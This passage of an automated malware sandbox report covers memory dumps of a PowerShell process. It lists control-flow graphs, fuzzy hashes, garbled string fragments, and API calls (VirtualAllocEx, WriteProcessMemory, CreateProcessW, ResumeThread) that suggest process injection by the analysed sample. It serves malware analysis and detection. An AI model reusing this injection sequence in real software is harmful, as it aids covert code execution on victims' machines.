                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Xbq$$^q
                                                                              • API String ID: 0-1593437937
                                                                              • Opcode ID: a4f88dcca04b87e549e20209101991119bb7bcc8d1348e621c4533106b4f7f17
                                                                              • Instruction ID: 2aaac71a642874781491af381c9c6d35b46577fe7b0225e8f7daeadd1726b31c
                                                                              • Opcode Fuzzy Hash: a4f88dcca04b87e549e20209101991119bb7bcc8d1348e621c4533106b4f7f17
                                                                              • Instruction Fuzzy Hash: CE827B34B10219CBDB24CF29D844BAAFBF2BB84700F5485A9D69A9B245DB34B881CF51
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 48d732cc54e4cd674dc37ea431944c8600c47954fb5ccbdf1e24cdcaba85ea50
                                                                              • Instruction ID: 8e0f76d82cfd67e432de86776c23e5d99f14a8237e76269df6fb176eb3f2889a
                                                                              • Opcode Fuzzy Hash: 48d732cc54e4cd674dc37ea431944c8600c47954fb5ccbdf1e24cdcaba85ea50
                                                                              • Instruction Fuzzy Hash: AE723A34B046148FDB54EF74D9587ADBBB2AF88310F108169DA0AA3794DF389D86CF51

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 71709c8-71709eb 1 7170bc6-7170c0e 0->1 2 71709f1-71709f6 0->2 10 7170c14-7170c19 1->10 11 7170d7b-7170d98 1->11 3 7170a0e-7170a12 2->3 4 71709f8-71709fe 2->4 8 7170b73-7170b7d 3->8 9 7170a18-7170a1c 3->9 5 7170a02-7170a0c 4->5 6 7170a00 4->6 5->3 6->3 14 7170b7f-7170b88 8->14 15 7170b8b-7170b91 8->15 12 7170a2f 9->12 13 7170a1e-7170a2d 9->13 20 7170c31-7170c35 10->20 21 7170c1b-7170c21 10->21 32 7170d5d-7170d78 11->32 33 7170d9a-7170dad 11->33 19 7170a31-7170a33 12->19 13->19 16 7170b97-7170ba3 15->16 17 7170b93-7170b95 15->17 23 7170ba5-7170bc3 16->23 17->23 19->8 22 7170a39-7170a59 19->22 24 7170c3b-7170c3d 20->24 25 7170d2a-7170d34 20->25 27 7170c25-7170c2f 21->27 28 7170c23 21->28 57 7170a5b-7170a76 22->57 58 7170a78 22->58 30 7170c3f-7170c4b 24->30 31 7170c4d 24->31 34 7170d36-7170d3f 25->34 35 7170d42-7170d48 25->35 27->20 28->20 40 7170c4f-7170c51 30->40 31->40 42 7170daf-7170dbb 33->42 43 7170dbd 33->43 36 7170d4e-7170d5a 35->36 37 7170d4a-7170d4c 35->37 45 7170d5c 36->45 37->45 40->25 46 7170c57-7170c59 40->46 44 7170dbf-7170dc1 42->44 43->44 48 7170dc3-7170dc9 44->48 49 7170e0d-7170e17 44->49 45->32 52 7170c5b-7170c67 46->52 53 7170c69 46->53 55 7170dd7-7170df4 48->55 56 7170dcb-7170dcd 48->56 61 7170e22-7170e28 49->61 62 7170e19-7170e1f 49->62 59 7170c6b-7170c6d 52->59 53->59 76 7170df6-7170e07 55->76 77 7170e5a-7170e5f 55->77 56->55 63 7170a7a-7170a7c 57->63 58->63 59->25 64 7170c73-7170c75 59->64 65 7170e2e-7170e3a 61->65 66 7170e2a-7170e2c 61->66 63->8 69 7170a82-7170a84 63->69 70 7170c77-7170c7d 64->70 71 7170c8f-7170c93 64->71 72 7170e3c-7170e57 65->72 66->72 78 7170a86-7170a92 69->78 79 7170a94 69->79 80 7170c81-7170c8d 70->80 81 7170c7f 70->81 74 7170c95-7170c9b 71->74 75 7170cad-7170d27 71->75 83 7170c9f-7170cab 74->83 84 7170c9d 74->84 76->49 77->76 86 7170a96-7170a98 78->86 79->86 80->71 81->71 83->75 84->75 86->8 90 7170a9e-7170abe 86->90 97 7170ad6-7170ada 90->97 98 7170ac0-7170ac6 90->98 101 7170af4-7170af8 97->101 102 7170adc-7170ae2 97->102 99 7170aca-7170acc 98->99 100 7170ac8 98->100 99->97 100->97 105 7170aff-7170b01 101->105 103 7170ae6-7170af2 102->103 104 7170ae4 102->104 103->101 104->101 107 7170b03-7170b09 105->107 108 7170b19-7170b70 105->108 109 7170b0d-7170b0f 107->109 110 7170b0b 107->110 109->108 110->108
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3310885943
                                                                              • Opcode ID: 1fd1e20d57e384872af6e9400c2acd22f0f25761f67c64762581748273004771
                                                                              • Instruction ID: b115d70010bfae6971a1a9b5ee0d7d5a05c34f698ef457102ecfeaa222a75f1c
                                                                              • Opcode Fuzzy Hash: 1fd1e20d57e384872af6e9400c2acd22f0f25761f67c64762581748273004771
                                                                              • Instruction Fuzzy Hash: A7C159B1B1430A8FDB298A39984076BBBF6AFC9610F24847AD405CF2C1DF32D945C7A1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 112 71713a0-71713c6 113 7171572-7171584 112->113 114 71713cc-71713d1 112->114 128 7171586-7171599 113->128 129 717159b-71715ba 113->129 115 71713d3-71713d9 114->115 116 71713e9-71713ed 114->116 118 71713dd-71713e7 115->118 119 71713db 115->119 120 71713f3-71713f5 116->120 121 717151e-7171528 116->121 118->116 119->116 122 71713f7-7171403 120->122 123 7171405 120->123 125 7171536-717153c 121->125 126 717152a-7171533 121->126 127 7171407-7171409 122->127 123->127 131 7171542-717154e 125->131 132 717153e-7171540 125->132 127->121 133 717140f-7171413 127->133 128->129 134 71715c0-71715c5 129->134 135 71716ec-717171d 129->135 136 7171550-717156f 131->136 132->136 137 7171426 133->137 138 7171415-7171424 133->138 140 71715c7-71715cd 134->140 141 71715dd-71715e1 134->141 153 717171f-717172b 135->153 154 717172d 135->154 144 7171428-717142a 137->144 138->144 148 71715d1-71715db 140->148 149 71715cf 140->149 145 71715e7-71715e9 141->145 146 717169e-71716a8 141->146 144->121 152 7171430-7171432 144->152 150 71715eb-71715f7 145->150 151 71715f9 145->151 155 71716b5-71716bb 146->155 156 71716aa-71716b2 146->156 148->141 149->141 159 71715fb-71715fd 150->159 151->159 160 7171434-7171440 152->160 161 7171442 152->161 162 717172f-7171731 153->162 154->162 163 71716c1-71716cd 155->163 164 71716bd-71716bf 155->164 159->146 166 7171603-7171605 159->166 165 7171444-7171446 160->165 161->165 167 7171733-7171752 162->167 168 717179f-71717a9 162->168 169 71716cf-71716e9 163->169 164->169 165->121 172 717144c-717144e 165->172 173 7171607-717160d 166->173 174 717161f-717162a 166->174 202 7171754-7171760 167->202 203 7171762 167->203 170 71717b2-71717b8 168->170 171 71717ab-71717af 168->171 176 71717be-71717ca 170->176 177 71717ba-71717bc 170->177 178 7171450-7171456 172->178 179 7171468-7171473 172->179 180 7171611-717161d 173->180 181 717160f 173->181 190 7171642-717169b 174->190 191 717162c-7171632 174->191 184 71717cc-71717ea 176->184 177->184 185 717145a-7171466 178->185 186 7171458 178->186 187 7171475-7171478 179->187 188 7171482-717148e 179->188 180->174 181->174 185->179 186->179 187->188 196 7171490-7171492 188->196 197 717149c-71714a3 188->197 198 7171636-7171638 191->198 199 7171634 191->199 196->197 205 71714aa-71714ac 197->205 198->190 199->190 206 7171764-7171766 202->206 203->206 209 71714c4-717151b 205->209 210 71714ae-71714b4 205->210 206->168 207 7171768-7171785 206->207 215 7171787-7171799 207->215 216 71717ed-71717f2 207->216 211 71714b6 210->211 212 71714b8-71714ba 210->212 211->209 212->209 215->168 216->215
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3512890053
                                                                              • Opcode ID: 94f2dcc407a058d143744d9f4e324132f482009498aa7dd04d93806428f35b65
                                                                              • Instruction ID: 9a67e61580719f10b00d39d5ccbcc31f3550c015b17365f9e998f5802f21cd9e
                                                                              • Opcode Fuzzy Hash: 94f2dcc407a058d143744d9f4e324132f482009498aa7dd04d93806428f35b65
                                                                              • Instruction Fuzzy Hash: 83B12FB5B0430EEFCB2A4E6998016BA7BF6AFC6610F24846AD805CF2D1DF31C945D761

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 607 7171f18-7171f3a 608 71720b7-7172102 607->608 609 7171f40-7171f45 607->609 615 717225d-7172275 608->615 616 7172108-717210d 608->616 610 7171f47-7171f4d 609->610 611 7171f5d-7171f69 609->611 612 7171f51-7171f5b 610->612 613 7171f4f 610->613 621 7172062-717206c 611->621 622 7171f6f-7171f72 611->622 612->611 613->611 636 7172277-7172279 615->636 637 7172215-7172216 615->637 619 7172125-7172129 616->619 620 717210f-7172115 616->620 624 717212f-7172133 619->624 625 7172208-7172212 619->625 627 7172117 620->627 628 7172119-7172123 620->628 629 717206e-7172077 621->629 630 717207a-7172080 621->630 622->621 623 7171f78-7171f7f 622->623 623->608 631 7171f85-7171f8a 623->631 632 7172135-7172146 624->632 633 7172173 624->633 634 7172214 625->634 635 7172220-7172226 625->635 627->619 628->619 638 7172086-7172092 630->638 639 7172082-7172084 630->639 640 7171fa2-7171fa6 631->640 641 7171f8c-7171f92 631->641 632->615 660 717214c-7172151 632->660 644 7172175-7172177 633->644 634->637 645 717222c-7172238 635->645 646 7172228-717222a 635->646 642 717227b-71722a2 636->642 643 7172219-717221d 636->643 637->643 648 7172094-71720b4 638->648 639->648 640->621 653 7171fac-7171fb0 640->653 650 7171f96-7171fa0 641->650 651 7171f94 641->651 654 717244c-717247c 642->654 655 71722a8-71722ad 642->655 644->625 656 717217d-7172181 644->656 657 717223a-717225a 645->657 646->657 650->640 651->640 661 7171fb2-7171fce 653->661 662 7171fd0 653->662 684 71724b5-71724bf 654->684 685 717247e-717249b 654->685 663 71722c5-71722c9 655->663 664 71722af-71722b5 655->664 656->625 665 7172187-7172196 656->665 671 7172153-7172159 660->671 672 7172169-7172171 660->672 675 7171fd2-7171fd4 661->675 662->675 667 71723f4-71723fe 663->667 668 71722cf-71722d3 663->668 673 71722b7 664->673 674 71722b9-71722c3 664->674 689 71721ae-7172205 665->689 690 7172198-717219e 665->690 677 7172400-7172409 667->677 678 717240c-7172412 667->678 679 71722d5-71722e6 668->679 680 7172313 668->680 686 717215d-7172167 671->686 687 717215b 671->687 672->644 673->663 674->663 675->621 683 7171fda-7171fe7 675->683 691 7172414-7172416 678->691 692 7172418-7172424 678->692 679->654 709 71722ec-71722f1 679->709 693 7172315-7172317 680->693 719 7171fee-7171ff0 683->719 695 71724c1-71724c5 684->695 696 71724c8-71724ce 684->696 712 7172505-717250a 685->712 713 717249d-71724af 685->713 686->672 687->672 697 71721a2-71721a4 690->697 698 71721a0 690->698 700 7172426-7172449 691->700 692->700 693->667 703 717231d-7172321 693->703 706 71724d4-71724e0 696->706 707 71724d0-71724d2 696->707 697->689 698->689 703->667 711 7172327-717232b 703->711 714 71724e2-7172502 706->714 707->714 715 71722f3-71722f9 709->715 716 7172309-7172311 709->716 711->667 718 7172331-7172357 711->718 712->713 713->684 722 71722fd-7172307 715->722 723 71722fb 715->723 716->693 718->667 735 717235d-7172361 718->735 724 7171ff2-7171ff8 719->724 725 7172008-717205f 719->725 722->716 723->716 729 7171ffc-7171ffe 724->729 730 7171ffa 724->730 729->725 730->725 736 7172384 735->736 737 7172363-717236c 735->737 740 7172387-7172394 736->740 738 7172373-7172380 737->738 739 717236e-7172371 737->739 741 7172382 738->741 739->741 742 717239a-71723f1 740->742 741->740
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (o^q$(o^q$4'^q$4'^q$4'^q$4'^q$_
                                                                              • API String ID: 0-287092520
                                                                              • Opcode ID: 82b9e0acc757a984f9886b0fb5d043b38505fe8818d4a75d0a9da4579211bc1a
                                                                              • Instruction ID: fba5cd4c9a8edd0b55388aeee5b238b7f89770b20fe23b45c13f8d058d5ee7fe
                                                                              • Opcode Fuzzy Hash: 82b9e0acc757a984f9886b0fb5d043b38505fe8818d4a75d0a9da4579211bc1a
                                                                              • Instruction Fuzzy Hash: 0CF11B71B04309DFDB298F68D8047AA7BB2FF85311F14C46AE5558B2D1DB31C986C7A1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 745 71700f0-7170115 746 717028d-71702a4 745->746 747 717011b-7170120 745->747 754 7170257-7170258 746->754 755 71702a6-71702ac 746->755 748 7170122-7170128 747->748 749 7170138-7170144 747->749 750 717012c-7170136 748->750 751 717012a 748->751 756 717023a-7170244 749->756 757 717014a-717014d 749->757 750->749 751->749 760 717025e-717026a 754->760 761 717025a-717025c 754->761 758 71702ae-71702d3 755->758 759 71702dc-71702de 755->759 764 7170246-717024f 756->764 765 7170252 756->765 757->756 763 7170153-717015a 757->763 766 717042a-7170434 call 7170439 758->766 767 71702d9 758->767 768 71702f6-71702fa 759->768 769 71702e0-71702e6 759->769 770 717026c-717028a 760->770 761->770 763->746 774 7170160-7170165 763->774 765->754 767->759 772 71703d7-71703e1 768->772 773 7170300-7170302 768->773 775 71702ea-71702f4 769->775 776 71702e8 769->776 783 71703e3-71703ec 772->783 784 71703ef-71703f5 772->784 778 7170304-7170310 773->778 779 7170312 773->779 781 7170167-717016d 774->781 782 717017d-7170181 774->782 775->768 776->768 786 7170314-7170316 778->786 779->786 788 7170171-717017b 781->788 789 717016f 781->789 782->756 790 7170187-7170189 782->790 791 71703f7-71703f9 784->791 792 71703fb-7170407 784->792 786->772 795 717031c-7170320 786->795 788->782 789->782 796 717018b-7170197 790->796 797 7170199 790->797 798 7170409-7170427 791->798 792->798 800 7170322-717033e 795->800 801 7170340 795->801 799 717019b-717019d 796->799 797->799 799->756 803 71701a3-71701a5 799->803 805 7170342-7170344 800->805 801->805 807 71701a7-71701ad 803->807 808 71701bf-71701c8 803->808 805->772 806 717034a-717035d 805->806 819 7170363-7170365 806->819 810 71701b1-71701bd 807->810 811 71701af 807->811 817 71701e0-7170237 808->817 818 71701ca-71701d0 808->818 810->808 811->808 820 71701d4-71701d6 818->820 821 71701d2 818->821 823 7170367-717036d 819->823 824 717037d-71703d4 819->824 820->817 821->817 825 7170371-7170373 823->825 826 717036f 823->826 825->824 826->824
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3199432138
                                                                              • Opcode ID: 8d5747c434876e1938a20e14cfc011cbf645c279674351855e7888d64b24567e
                                                                              • Instruction ID: ed3805b168944d55ec023c8ee37dfe4753cdbf20e30b25f1f2c5ca298025b941
                                                                              • Opcode Fuzzy Hash: 8d5747c434876e1938a20e14cfc011cbf645c279674351855e7888d64b24567e
                                                                              • Instruction Fuzzy Hash: 0F81F8B1B0030ACFCB299F69D94466AB7F6BF8D210F14847AD445CB295EB31D885CB91
                                                                              APIs
                                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,?,?), ref: 042FC20C
                                                                              • VirtualAllocEx.KERNEL32(?,?,00000000,?,?), ref: 042FC300
                                                                                • Part of subcall function 042F75C8: WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A37789D,00000000,?,?,?,192B18E4,00000000,?,042FC363,?,00000000,?), ref: 042FD254
                                                                              • ResumeThread.KERNELBASE(?), ref: 042FC6AA
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 042FCB64
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                              • String ID:
                                                                              • API String ID: 4270437565-0
                                                                              • Opcode ID: 46cac9c85bacd46f8f0d2e8038f14e0837bf944f11b1af52b7ec0556c9394242
                                                                              • Instruction ID: c144ae1cf5bb53cf587f4edb22c887088ad33c055fcac94494732c3b551513a5
                                                                              • Opcode Fuzzy Hash: 46cac9c85bacd46f8f0d2e8038f14e0837bf944f11b1af52b7ec0556c9394242
                                                                              • Instruction Fuzzy Hash: BC824870A1021ACFDB24CF66CD44BAAF7F2BF44304F9484A9D65AAB654DB70B984CF50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1301 71709a8-71709eb 1303 7170bc6-7170c0e 1301->1303 1304 71709f1-71709f6 1301->1304 1312 7170c14-7170c19 1303->1312 1313 7170d7b-7170d98 1303->1313 1305 7170a0e-7170a12 1304->1305 1306 71709f8-71709fe 1304->1306 1310 7170b73-7170b7d 1305->1310 1311 7170a18-7170a1c 1305->1311 1307 7170a02-7170a0c 1306->1307 1308 7170a00 1306->1308 1307->1305 1308->1305 1316 7170b7f-7170b88 1310->1316 1317 7170b8b-7170b91 1310->1317 1314 7170a2f 1311->1314 1315 7170a1e-7170a2d 1311->1315 1322 7170c31-7170c35 1312->1322 1323 7170c1b-7170c21 1312->1323 1334 7170d5d-7170d78 1313->1334 1335 7170d9a-7170dad 1313->1335 1321 7170a31-7170a33 1314->1321 1315->1321 1318 7170b97-7170ba3 1317->1318 1319 7170b93-7170b95 1317->1319 1325 7170ba5-7170bc3 1318->1325 1319->1325 1321->1310 1324 7170a39-7170a59 1321->1324 1326 7170c3b-7170c3d 1322->1326 1327 7170d2a-7170d34 1322->1327 1329 7170c25-7170c2f 1323->1329 1330 7170c23 1323->1330 1359 7170a5b-7170a76 1324->1359 1360 7170a78 1324->1360 1332 7170c3f-7170c4b 1326->1332 1333 7170c4d 1326->1333 1336 7170d36-7170d3f 1327->1336 1337 7170d42-7170d48 1327->1337 1329->1322 1330->1322 1342 7170c4f-7170c51 1332->1342 1333->1342 1344 7170daf-7170dbb 1335->1344 1345 7170dbd 1335->1345 1338 7170d4e-7170d5a 1337->1338 1339 7170d4a-7170d4c 1337->1339 1347 7170d5c 1338->1347 1339->1347 1342->1327 1348 7170c57-7170c59 1342->1348 1346 7170dbf-7170dc1 1344->1346 1345->1346 1350 7170dc3-7170dc9 1346->1350 1351 7170e0d-7170e17 1346->1351 1347->1334 1354 7170c5b-7170c67 1348->1354 1355 7170c69 1348->1355 1357 7170dd7-7170df4 1350->1357 1358 7170dcb-7170dcd 1350->1358 1363 7170e22-7170e28 1351->1363 1364 7170e19-7170e1f 1351->1364 1361 7170c6b-7170c6d 1354->1361 1355->1361 1378 7170df6-7170e07 1357->1378 1379 7170e5a-7170e5f 1357->1379 1358->1357 1365 7170a7a-7170a7c 1359->1365 1360->1365 1361->1327 1366 7170c73-7170c75 1361->1366 1367 7170e2e-7170e3a 1363->1367 1368 7170e2a-7170e2c 1363->1368 1365->1310 1371 7170a82-7170a84 1365->1371 1372 7170c77-7170c7d 1366->1372 1373 7170c8f-7170c93 1366->1373 1374 7170e3c-7170e57 1367->1374 1368->1374 1380 7170a86-7170a92 1371->1380 1381 7170a94 1371->1381 1382 7170c81-7170c8d 1372->1382 1383 7170c7f 1372->1383 1376 7170c95-7170c9b 1373->1376 1377 7170cad-7170d27 1373->1377 1385 7170c9f-7170cab 1376->1385 1386 7170c9d 1376->1386 1378->1351 1379->1378 1388 7170a96-7170a98 1380->1388 1381->1388 1382->1373 1383->1373 1385->1377 1386->1377 1388->1310 1392 7170a9e-7170abe 1388->1392 1399 7170ad6-7170ada 1392->1399 1400 7170ac0-7170ac6 1392->1400 1403 7170af4-7170af8 1399->1403 1404 7170adc-7170ae2 1399->1404 1401 7170aca-7170acc 1400->1401 1402 7170ac8 1400->1402 1401->1399 1402->1399 1407 7170aff-7170b01 1403->1407 1405 7170ae6-7170af2 1404->1405 1406 7170ae4 1404->1406 1405->1403 1406->1403 1409 7170b03-7170b09 1407->1409 1410 7170b19-7170b70 1407->1410 1411 7170b0d-7170b0f 1409->1411 1412 7170b0b 1409->1412 1411->1410 1412->1410
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$$^q$$^q
                                                                              • API String ID: 0-2291298209
                                                                              • Opcode ID: 9a95befbfd5083d2b14409d10ff708f577a8afca07a8762adc4029ce723d6563
                                                                              • Instruction ID: 0e4ee789f555224631373f0c787182efeeec828bbb89bf4af4c0e6982399270f
                                                                              • Opcode Fuzzy Hash: 9a95befbfd5083d2b14409d10ff708f577a8afca07a8762adc4029ce723d6563
                                                                              • Instruction Fuzzy Hash: 883107B461530A9FCB268E34C811B7A7BB1AF89A14F594067D401DB1D2EB35CB85CB71

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1414 7171380-71713c6 1416 7171572-7171584 1414->1416 1417 71713cc-71713d1 1414->1417 1431 7171586-7171599 1416->1431 1432 717159b-71715ba 1416->1432 1418 71713d3-71713d9 1417->1418 1419 71713e9-71713ed 1417->1419 1421 71713dd-71713e7 1418->1421 1422 71713db 1418->1422 1423 71713f3-71713f5 1419->1423 1424 717151e-7171528 1419->1424 1421->1419 1422->1419 1425 71713f7-7171403 1423->1425 1426 7171405 1423->1426 1428 7171536-717153c 1424->1428 1429 717152a-7171533 1424->1429 1430 7171407-7171409 1425->1430 1426->1430 1434 7171542-717154e 1428->1434 1435 717153e-7171540 1428->1435 1430->1424 1436 717140f-7171413 1430->1436 1431->1432 1437 71715c0-71715c5 1432->1437 1438 71716ec-717171d 1432->1438 1439 7171550-717156f 1434->1439 1435->1439 1440 7171426 1436->1440 1441 7171415-7171424 1436->1441 1443 71715c7-71715cd 1437->1443 1444 71715dd-71715e1 1437->1444 1456 717171f-717172b 1438->1456 1457 717172d 1438->1457 1447 7171428-717142a 1440->1447 1441->1447 1451 71715d1-71715db 1443->1451 1452 71715cf 1443->1452 1448 71715e7-71715e9 1444->1448 1449 717169e-71716a8 1444->1449 1447->1424 1455 7171430-7171432 1447->1455 1453 71715eb-71715f7 1448->1453 1454 71715f9 1448->1454 1458 71716b5-71716bb 1449->1458 1459 71716aa-71716b2 1449->1459 1451->1444 1452->1444 1462 71715fb-71715fd 1453->1462 1454->1462 1463 7171434-7171440 1455->1463 1464 7171442 1455->1464 1465 717172f-7171731 1456->1465 1457->1465 1466 71716c1-71716cd 1458->1466 1467 71716bd-71716bf 1458->1467 1462->1449 1469 7171603-7171605 1462->1469 1468 7171444-7171446 1463->1468 1464->1468 1470 7171733-7171752 1465->1470 1471 717179f-71717a9 1465->1471 1472 71716cf-71716e9 1466->1472 1467->1472 1468->1424 1475 717144c-717144e 1468->1475 1476 7171607-717160d 1469->1476 1477 717161f-717162a 1469->1477 1505 7171754-7171760 1470->1505 1506 7171762 1470->1506 1473 71717b2-71717b8 1471->1473 1474 71717ab-71717af 1471->1474 1479 71717be-71717ca 1473->1479 1480 71717ba-71717bc 1473->1480 1481 7171450-7171456 1475->1481 1482 7171468-7171473 1475->1482 1483 7171611-717161d 1476->1483 1484 717160f 1476->1484 1493 7171642-717169b 1477->1493 1494 717162c-7171632 1477->1494 1487 71717cc-71717ea 1479->1487 1480->1487 1488 717145a-7171466 1481->1488 1489 7171458 1481->1489 1490 7171475-7171478 1482->1490 1491 7171482-717148e 1482->1491 1483->1477 1484->1477 1488->1482 1489->1482 1490->1491 1499 7171490-7171492 1491->1499 1500 717149c-71714a3 1491->1500 1501 7171636-7171638 1494->1501 1502 7171634 1494->1502 1499->1500 1508 71714aa-71714ac 1500->1508 1501->1493 1502->1493 1509 7171764-7171766 1505->1509 1506->1509 1512 71714c4-717151b 1508->1512 1513 71714ae-71714b4 1508->1513 1509->1471 1510 7171768-7171785 1509->1510 1518 7171787-7171799 1510->1518 1519 71717ed-71717f2 1510->1519 1514 71714b6 1513->1514 1515 71714b8-71714ba 1513->1515 1514->1512 1515->1512 1518->1471 1519->1518
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2144582339.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7170000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 4'^q$$^q$$^q
                                                                              • API String ID: 0-2291298209
                                                                              • Opcode ID: debe5e50e5ab08be89b7fca747d5921dbc93e184342611195263b35d8484afb8
                                                                              • Instruction ID: 91e9b947ccf22583bb730a5ad7de47d9fd791fea2d3dc3e1e11968e7cb6c675b
                                                                              • Opcode Fuzzy Hash: debe5e50e5ab08be89b7fca747d5921dbc93e184342611195263b35d8484afb8
                                                                              • Instruction Fuzzy Hash: DC3106B090430EFFCB2A8E29C5416A577F1EFC2611F1985AADC06CB1C1E734C945EB61

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1521 42fcdc4-42fd21e 1524 42fd228-42fd261 WriteProcessMemory 1521->1524 1525 42fd220-42fd226 1521->1525 1526 42fd26a-42fd28b 1524->1526 1527 42fd263-42fd269 1524->1527 1525->1524 1527->1526
                                                                              APIs
                                                                              • WriteProcessMemory.KERNELBASE(?,00000000,00000000,1A37789D,00000000,?,?,?,192B18E4,00000000,?,042FC363,?,00000000,?), ref: 042FD254
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: cc7233416888cd4ad836e7184f22b265035828c4236309b902e341c6d064c3dc
                                                                              • Instruction ID: f24ab463e22358e1d27dc9d5926874572f89a5ca697843c9a955d07f651664e3
                                                                              • Opcode Fuzzy Hash: cc7233416888cd4ad836e7184f22b265035828c4236309b902e341c6d064c3dc
                                                                              • Instruction Fuzzy Hash: 4D3148759053899FDB01CFA9C840ADEBFF8FF09320F04806AE584E7252C378A944CBA5

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1529 42fca14-42fca99 1531 42fca9b-42fca9e 1529->1531 1532 42fcaa1-42fcaa8 1529->1532 1531->1532 1533 42fcaaa-42fcab0 1532->1533 1534 42fcab3-42fcac9 1532->1534 1533->1534 1535 42fcacb-42fcad1 1534->1535 1536 42fcad4-42fcb77 CreateProcessW 1534->1536 1535->1536 1538 42fcb79-42fcb7f 1536->1538 1539 42fcb80-42fcbf8 1536->1539 1538->1539 1546 42fcc0a-42fcc11 1539->1546 1547 42fcbfa-42fcc00 1539->1547 1548 42fcc28 1546->1548 1549 42fcc13-42fcc22 1546->1549 1547->1546 1551 42fcc29 1548->1551 1549->1548 1551->1551
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 042FCB64
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2097034485.00000000042F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 042F0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_42f0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: b09ee04dcc11c7e8a171bf871a46fef260532e8f5601ab6be535557a97a35512
                                                                              • Instruction ID: 0dc893d7797219e59bc4ff02b80933afee6efe16554745bb34093672b7c59f30
                                                                              • Opcode Fuzzy Hash: b09ee04dcc11c7e8a171bf871a46fef260532e8f5601ab6be535557a97a35512
                                                                              • Instruction Fuzzy Hash: DE514B7190121ADFDB24CF99CD40BDDBBB5BF48314F1485AAE909B7250D735AA84CF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
